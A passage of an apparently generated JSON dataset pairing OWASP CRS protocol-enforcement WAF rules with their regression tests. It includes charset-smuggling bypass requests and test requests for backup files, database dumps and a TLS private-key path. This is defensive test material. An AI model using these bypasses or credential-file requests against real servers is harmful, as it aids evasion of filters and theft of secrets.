"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 967, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "charset\\s*=\\s*[\\\"']?([^;\\\"'\\s]+)", "actions": [ { "act_name": "id", "lineno": 968, "act_quote": "no_quote", "act_arg": "920480", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 969, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 970, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 971, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 972, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 973, "act_quote": "quotes", "act_arg": "Request content type charset is not allowed by policy", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 974, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 975, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 976, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 977, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 978, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 979, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 980, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 981, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 982, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 983, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 984, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 985, "act_quote": "quotes", "act_arg": "tx.content_type_charset=|%{tx.1}|", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 986, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 967 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "content_type_charset", "negated": false } ], "operator": { "type": "@within", "argument": "%{tx.allowed_request_content_type_charset}", "negated": true } }, "transformations": [ "lowercase" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 987, "variables": [ { "variable": "TX", "variable_part": "content_type_charset", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@within", "operator_argument": "%{tx.allowed_request_content_type_charset}", "actions": [ { "act_name": "t", "lineno": 988, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ctl", "lineno": 989, "act_quote": "no_quote", "act_arg": "forceRequestBodyVariable", "act_arg_val": "On", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 990, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 987 } }, { "rule_id": "920530", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "charset.*?charset", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "Multiple charsets detected in content type header", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153" ] }, "test_cases": [ { "description": "A valid request with a single charset", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920530 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "Bypass attempt with two charsets", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8; charset=utf-7", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920530 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "Bypass attempt with hiding the charset inside a field", "test_id": 3, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8; boundary=\"charset=utf-7\"", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920530 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "Bypass attempt with uppercase CHARSET", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8; CHARSET=utf-7", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920530 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 995, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "charset.*?charset", "actions": [ { "act_name": "id", "lineno": 996, "act_quote": "no_quote", "act_arg": "920530", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 997, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 998, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 999, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 999, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1000, "act_quote": "quotes", "act_arg": "Multiple charsets detected in content type header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1001, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1002, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1003, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1004, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1005, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1006, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1007, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1008, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1009, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1010, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1011, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1012, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 995 } }, { "rule_id": "920430", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_PROTOCOL", "part": "", "negated": false } ], "operator": { "type": "@within", "argument": "%{tx.allowed_http_versions}", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "HTTP protocol version is not allowed by policy", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920430 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920430 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "", "test_id": 4, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920430 ] }, "malicious_patterns": [] }, { "description": "Request line without version will be interpreted as HTTP/0.9.\nNote that go-ftw currently can't handle the generated response though and\nwill see a premature EOF.\n", "test_id": 5, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920430 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 6, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "", "test_id": 7, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "HTTP protocol version is not allowed by policy (920430) from old modsec regressions", "test_id": 8, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920430 ] }, "malicious_patterns": [] }, { "description": "HTTP protocol version is not allowed by policy (920430) from old modsec regressions", "test_id": 9, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "HTTP protocol version is not allowed by policy (920430) from old modsec regressions", "test_id": 10, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1017, "variables": [ { "variable": "REQUEST_PROTOCOL", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@within", "operator_argument": "%{tx.allowed_http_versions}", "actions": [ { "act_name": "id", "lineno": 1018, "act_quote": "no_quote", "act_arg": "920430", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1019, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1020, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1021, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1022, "act_quote": "quotes", "act_arg": "HTTP protocol version is not allowed by policy", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1023, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1024, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1025, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1026, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1027, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1028, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1029, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1030, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1031, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1032, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1033, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1034, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 1017 } }, { "rule_id": "920440", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_BASENAME", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "\\.([^.]+)$", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "URL file extension is restricted by policy", "logdata": "%{TX.0}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "URL file extension is restricted by policy (920440) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/get/foo.bak", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "URL file extension is restricted by policy (920440) from old modsec regressions", "test_id": 2, "request": { "method": "GET", "uri": "/get/foo.db", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "URL file extension is restricted by policy (920440) from old modsec regressions", "test_id": 3, "request": { "method": "GET", "uri": "/get/foo.old", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "URL file extension is restricted by policy (920440) - GH issue 1296", "test_id": 4, "request": { "method": "GET", "uri": "/get/foo.bar.sql", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "Redis dump file", "test_id": 5, "request": { "method": "GET", "uri": "/get/dump.rdb", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "Redis dump file, URI encoded", "test_id": 6, "request": { "method": "GET", "uri": "/get/dump%2Erdb", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "Block accessing private key files", "test_id": 7, "request": { "method": "GET", "uri": "/get/etc/letsencrypt/live/example.com/privkey.pem", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920440 ] }, "malicious_patterns": [] }, { "description": "False Positive:\nDon't block font files\n", "test_id": 8, "request": { "method": "GET", "uri": "/get/wp-content/plugins/wp-dark-mode/assets/fonts/Inter.ttf", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920440 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1039, "variables": [ { "variable": "REQUEST_BASENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\.([^.]+)$", "actions": [ { "act_name": "id", "lineno": 1040, "act_quote": "no_quote", "act_arg": "920440", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1041, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1042, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1043, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1044, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1044, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1045, "act_quote": "quotes", "act_arg": "URL file extension is restricted by policy", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1046, "act_quote": "quotes", "act_arg": "%{TX.0}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1047, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1048, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1049, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1050, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1051, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1052, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1053, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1054, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1055, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1056, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1057, "act_quote": "quotes", "act_arg": "tx.extension=.%{tx.1}/", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1058, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1039 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "EXTENSION", "negated": false } ], "operator": { "type": "@within", "argument": "%{tx.restricted_extensions}", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1059, "variables": [ { "variable": "TX", "variable_part": "EXTENSION", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@within", "operator_argument": "%{tx.restricted_extensions}", "actions": [ { "act_name": "t", "lineno": 1060, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1060, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1061, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1059 } }, { "rule_id": "920500", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_FILENAME", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "\\.[^.~]+~(?:/.*|)$", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "Attempt to access a backup or working file", "logdata": "%{TX.0}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Check request filename ends with ~", "test_id": 1, "request": { "method": "GET", "uri": "/index.php~", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920500 ] }, "malicious_patterns": [] }, { "description": "Check request filename contains file that ends with ~ but not at end of string (bypass)", "test_id": 2, "request": { "method": "GET", "uri": "/index.php~/foo/bar/", "headers": { 